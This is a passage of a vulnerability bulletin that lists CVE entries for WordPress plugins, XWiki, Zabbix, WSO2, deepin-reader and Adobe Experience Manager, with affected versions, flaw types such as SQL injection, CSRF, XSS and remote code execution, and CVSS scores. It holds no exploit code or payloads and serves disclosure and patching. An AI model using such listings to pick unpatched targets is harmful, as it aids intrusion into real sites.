wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4.2023-12-178.8CVE-2023-49816
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1.2023-12-178.8CVE-2023-49824
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX - Currency Switcher Professional for WooCommerce. This issue affects FOX - Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.2023-12-178.8CVE-2023-49834
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.2023-12-188.8CVE-2023-49840
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21.2023-12-188.8CVE-2023-49843
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0.2023-12-188.8CVE-2023-49844
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kurulu?u A.?. PayTR Taksit Tablosu - WooCommerce. This issue affects PayTR Taksit Tablosu - WooCommerce: from n/a through 1.3.1.2023-12-188.8CVE-2023-49853
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy - Smart Side Cart for WooCommerce. This issue affects Caddy - Smart Side Cart for WooCommerce: from n/a through 1.9.7.2023-12-188.8CVE-2023-49854
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3.2023-12-188.8CVE-2023-49855
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1.2023-12-188.8CVE-2023-50372
audit@patchstack.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.2023-12-188.8CVE-2023-5882
contact@wpscan.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.2023-12-188.8CVE-2023-5886
contact@wpscan.com
wordpress -- wordpressThe Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.2023-12-158.8CVE-2023-6827
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.2023-12-238.1CVE-2023-6971
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-237.4CVE-2020-36769
security@wordfence.com
security@wordfence.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12.2023-12-207.1CVE-2023-26525
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2.2023-12-207.1CVE-2023-28788
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2.2023-12-207.6CVE-2023-30872
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7.2023-12-207.2CVE-2023-32128
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1.2023-12-207.6CVE-2023-32743
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76.2023-12-187.2CVE-2023-33331
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2.2023-12-207.5CVE-2023-35914
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.6CVE-2023-35915
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.5CVE-2023-35916
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3.2023-12-207.6CVE-2023-38519
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-207.4CVE-2023-46147
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf - Export To Pdf Tool for WordPress. This issue affects E2Pdf - Export To Pdf Tool for WordPress: from n/a through 1.20.18.2023-12-197.2CVE-2023-46154
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8.2023-12-207.6CVE-2023-47236
audit@patchstack.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server2023-12-187.2CVE-2023-4724
contact@wpscan.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7.2023-12-187.2CVE-2023-47530
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5.2023-12-207.2CVE-2023-47852
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.1.2023-12-217.5CVE-2023-48288
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Vendors WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7.2023-12-197.6CVE-2023-48327
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8.2023-12-197.2CVE-2023-48741
audit@patchstack.com
wordpress -- wordpressServer-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4.2023-12-157.5CVE-2023-49159
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2.2023-12-197.2CVE-2023-49764
audit@patchstack.com
wordpress -- wordpressThe SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts' content.2023-12-187.5CVE-2023-5949
contact@wpscan.com
wordpress -- wordpressThe Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request2023-12-187.5CVE-2023-6203
contact@wpscan.com
wordpress -- wordpressIThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks2023-12-187.2CVE-2023-6222
contact@wpscan.com
contact@wpscan.com
wordpress -- wordpressThe SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.2023-12-187.2CVE-2023-6295
contact@wpscan.com
wordpress -- wordpressThe E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.2023-12-157.2CVE-2023-6826
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.2023-12-237.5CVE-2023-6972
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the 'url' parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system.2023-12-237.2CVE-2023-7002
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpress
 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50.2023-12-208.5CVE-2023-33330
audit@patchstack.com
wordpress -- wordpress
 
Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0.2023-12-198.3CVE-2023-34027
audit@patchstack.com
wordpress -- wordpress
 
Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15.2023-12-208.4CVE-2023-47784
audit@patchstack.com
wordpress -- wordpress
 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-208.5CVE-2023-49825
audit@patchstack.com
wordpress -- wordpress
 
Deserialization of Untrusted Data vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-218.1CVE-2023-49826
audit@patchstack.com
wordpress -- wordpress
 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection - Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection - Stop Brute Force Attacks: from n/a through 2.2.5.2023-12-197.6CVE-2023-48764
audit@patchstack.com
wordpress -- wordpress
 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2.2023-12-207.6CVE-2023-49161
audit@patchstack.com
wordpress -- wordpress
 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0.2023-12-207.6CVE-2023-49166
audit@patchstack.com
wordpress -- wordpress
 
Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.2023-12-197.5CVE-2023-49819
audit@patchstack.com
wso2 -- multiple_productsMultiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.2023-12-158.5CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- multiple_productsMultiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.2023-12-157.5CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. -- deepin-readerDeepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.2023-12-229.3CVE-2023-50254
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki -- xwikiXWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`.2023-12-158.8CVE-2023-50721
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki -- xwikiXWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.2023-12-158.8CVE-2023-50722
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki -- xwikiXWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages.2023-12-158.8CVE-2023-50723
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki -- xwikiXWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1.2023-12-218.3CVE-2023-50732
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
xwiki -- xwikiXWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.2023-12-157.5CVE-2023-50719
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
zabbix -- zabbix-agentThe vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server.2023-12-188.1CVE-2023-32726
security@zabbix.com
zabbix -- zabbix-agent2The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command resulting possible vulnerability for remote code execution.2023-12-189.8CVE-2023-32728
security@zabbix.com
zabbix -- zabbix_serverThe website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user.2023-12-188.8CVE-2023-32725
security@zabbix.com
zabbix -- zabbix_serverAn attacker who has the privilege to configure Zabbix items can use function icmpping() with additional malicious command inside it to execute arbitrary code on the current Zabbix server.2023-12-187.2CVE-2023-32727
security@zabbix.com

Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-47064
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-47065
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48440
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction.2023-12-155.3CVE-2023-48441
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48442
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48443
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48444
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48445
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48446
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48447
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48448
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48449
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48450
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48451
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48452
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48453
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48454
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48455
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48456
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48457
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48458
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48459
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48460
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48461
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48462
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48463
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48464
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48465
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48466
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48467
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48468
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48469
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48470
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48471
psirt@adobe.com
